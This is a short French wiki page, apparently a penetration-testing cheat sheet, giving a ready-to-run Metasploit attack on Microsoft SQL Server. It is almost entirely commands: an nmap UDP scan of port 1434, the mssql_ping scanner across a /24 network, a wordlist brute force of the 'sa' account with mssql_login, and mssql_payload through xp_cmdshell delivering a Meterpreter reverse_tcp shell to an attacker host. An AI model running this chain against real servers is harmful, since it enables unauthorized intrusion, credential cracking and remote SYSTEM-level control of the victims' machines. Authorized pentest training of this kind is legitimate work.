Sqlserveur metasploit

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Exploitation Microsoft SQL Server
Ports 1433/tcp, 1434/udp
Modules scanner/mssql/*, windows/mssql/*
Voir aussi Scans metasploit · Z construire son module metasploit

Attaque d'un serveur Microsoft SQL Server : découverte, force brute du compte sa, puis exécution de commandes via xp_cmdshell. SQL Server écoute sur le port TCP 1433, ou sur un port dynamique — scanner alors 1434 en UDP.

Découverte

nmap -sU 192.168.0.0/24 -p1434

use scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.0.0/24
set THREADS 255
run

Force brute

use scanner/mssql/mssql_login
show options
set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt
set THREADS 10
set verbose false
exploit

xp_cmdshell

Avec ce module, on interagit avec le système via le compte sa (services exécutés en SYSTEM) :

use windows/mssql/mssql_payload
show options
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.19
set RHOST 192.168.0.31
set PASSWORD password123
exploit

Voir aussi